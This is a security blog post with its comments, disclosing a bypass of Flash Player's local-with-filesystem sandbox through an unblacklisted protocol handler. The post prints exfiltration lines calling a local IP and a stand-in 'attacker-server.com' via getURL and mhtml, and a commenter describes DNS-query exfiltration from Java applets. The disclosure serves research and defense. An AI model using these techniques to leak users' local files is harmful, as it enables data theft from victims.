One of the readers (PZ) had a question about the SWFs local-with-filesystem sandbox, which should prevent SWFs loaded from the local file system from passing data to remote systems. Looking at the documentation related to the sandbox, we see the following:
Local file describes any file that is referenced by using the file: protocol or a Universal Naming Convention (UNC) path. Local SWF files are placed into one of four local sandboxes:
The local-with-filesystem sandbox—For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.
First, I think the documentation here is a bit too generous. SWFs loaded from the local file system do face some restrictions. The most relevant restrictions are probably:
- The SWF cannot make a call to JavaScript (or vbscript), either through URL or ExternalInterface
- The SWF cannot call a HTTP or HTTPS request.
- Querystring parameters (ex. Blah.php?querystring=qs-value) are stripped and will not be passed (even for requests to local files)
Unfortunately, these restrictions are not the same as, “cannot communicate with the network in any way” which is what is stated in the documentation. The simplest way to bypass the local-with-filesystem sandbox is to simply use a file:// request to a remote server. For example, after loading the content from the local file system an attacker can simply pass the contents to the attacker server via getURL() and a url like: file://\\192.168.1.1\stolen-data-here\
Fortunately, it seems you can only pass IPs and hostnames for system on the local network (RFC 1918 addresses). If an attacker wants to send data to a remote server on the Internet we’ll have to resort to a couple other tricks. A while back, I put up a post on the dangers of blacklisting protocol handlers. It's basically impossible to create a list of "bad" protocol handlers in siutation like this. In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of protocol handler blacklists. If we can find a protocol handler that hasn’t been blacklisted by Adobe and allows for network communication, we win.
There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:
getURL('mhtml:http://attacker-server.com/stolen-data-here', '');
Some other benefits for using the mhtml protocol handler are:
- The request goes over http/https and port 80/443 so it will get past most egress filtering
- If the request results in a 404, it will silently fail. The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer
- The protocol handler is available by default on Win7 and will launch with no protocol handler warning
There you go, an easy way to bypass Flash’s local-with-file system sandbox. Two lessons here. One, running un-trusted code (whether it’s an executable, javascript, or even a swf) is dangerous. Two, protocol handler blacklists are bad. Hope this helps PZ!
Sweet, you are a schemer dude :D
ReplyDeleteI did some work on this sometime back and also released a Whitepaper [http://www.andlabs.org/whitepapers/F_IE_PrisonBreak.pdf] and a tool which extracted files from the harddisk. But I used the more simpler method - \\192.168.1.1\stolen-data-here\
ReplyDeleteUsing mhtml is a very clever approach!
Couple of points:
1) This still requires the attacker to have some kind of access to the internal network since the Flash file must be loaded from within the LAN. In this case does being able to send the output to a remote system have any clear advantage?
2) Someone who read my whitepaper sent me an e-mail mentioning that he was able to send the data to remote systems using DNS tunneling. Am wondering if this would work since you mention that only hostnames from local network can be called. Any thoughts?
Thanks.
A fun trick I use for exfiltrating data from Java is the gethostname() call. The sandbox prevents the caller from seeing the results of the lookup, but it doesn't prevent the lookup from occurring. You can send any data you like out via DNS queries from a sandboxed Java applet. We used this in the Decloak.net code today.
ReplyDeleteI recently research some flash security,but when I public the swf to the web,it couldn't visit local files.Could you send me the .fla?
ReplyDelete[...] not be able to send local data to a remote server. However, Security specialist Billy Rios has determined that Adobe controls access to the network using a blacklist of protocol handlers. Protocols such as [...]
ReplyDelete[...] - Bypassing Flash’s local-with-filesystem Sandbox, sul blog di Billy (BK) Rios - Flash Player Security Basics - Security Domains, Application [...]
ReplyDelete[...] the security researcher, Billy Rios has discovered that Adobe controls access to the network using a blacklist of protocols such as HTTP and HTTPS. [...]
ReplyDelete[...] adds are easy), hard to maintain (but when should entries be removed?) measure. (See also: How Adobe blacklisted certain URL prefixes when implementing its local-with-filesystem-sandbox, but failed [...]
ReplyDelete[...] beveiligingsonderzoeker Billy Rios heeft een prove-of-concept gepresenteerd die laat zien dat het mogelijk is om via Flash toegang te krijgen tot lokale [...]
ReplyDelete[...] الباحث الأمني Billy Rios على مدونته POC) Proof of Concept) لإمكانية تجاوز حماية الـ Sandbox التي [...]
ReplyDelete[...] Player that's designed to harden it against hack attacks. Billy Rios, a Google researcher who published the method on his personal website, said it circumvents the local-with-filesystem sandbox, which is supposed [...]
ReplyDelete[...] Rios, a Google researcher who published the method on his personal website, said it circumvents the local-with-filesystem sandbox, which is supposed [...]
ReplyDelete[...] Rios, a researcher who is a security engineer for Microsoft, published on his personal blog a way to get around Flash Player’s local-within-filesystem [...]
ReplyDelete[...] Rios, experto en seguridad informática de Microsoft, explicó en su blog los pasos necesarios para poder esquivar sandbox y desveló el método que podría permitir a los [...]
ReplyDelete[...] to application security researcher Billy Rios, there is a way to bypass the local-with-filesystem sandbox utilised in Adobe Flash [...]
ReplyDelete[...] when we try to test something locally, before upload it to the server. Anyways, we have Mr. Billy Rios, a Security Researcher who discovered “an easy way to bypass Flash’s local-with-file [...]
ReplyDelete[...] sistema y en la implementación del sandbox para mejorar la seguridad del producto.Según publica en su blog, el experto en seguridad Billy Rios, el famoso sandbox de Adobe es vulnerable. En palabras del [...]
ReplyDelete[...] Player that’s designed to harden it against hack attacks. Billy Rios, a Google researcher who published the method on his personal website, said it circumvents the local-with-filesystem sandbox, which is supposed [...]
ReplyDelete[...] publica en su blog, el experto en seguridad Billy Rios, el famoso sandbox de Adobe es vulnerable. En palabras del [...]
ReplyDelete[...] Adobe Flash Player. Билли Риос, исследователь компании Google, опубликовавший данный метод на своем собственном сайт..., сообщил, что благодаря этому методу возможно обойти [...]
ReplyDelete[...] Adobe Flash Player. Билли Риос, исследователь компании Google, опубликовавший данный метод на своем собственном сайт..., сообщил, что благодаря этому методу возможно обойти [...]
ReplyDelete[...] Rios, a researcher who is a security engineer for Microsoft, published on his personal blog a way to get around Flash Player’s local-within-filesystem [...]
ReplyDeleteSo, er, at the moment, do you think it's better to stick with 9.4.1 (current setup) or better to move to X? Or something else entirely?
ReplyDelete[...] Billy (BK) Rios » Bypassing Flash’s local-with-filesystem Sandbox [...]
ReplyDelete[...] which has been introduced in December 2010 is not as effective as it could be. Security researcher Billy Rios discovered a way to bypass Adobe’s Flash Player sandbox locally.He found out that SWFs that [...]
ReplyDeletehttp://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt
ReplyDeletethis is bunk
ReplyDeletefile://\\192.168.1.1\stolen-data-here\
and
mhtml:http://attacker-server.com/stolen-data-here
will throw a streamerror with or without sandbox
with a URLRequest.
These are just invalid urls and dont do a thing.
and by the way the getURL method you are using is as2 and will just open a browser window which will probaly also fail to parse the urls.
You just put some fancy security terminology together to make a blogpost.
At least have the guts to provide us some serious sourcefiles or examplecode to look at.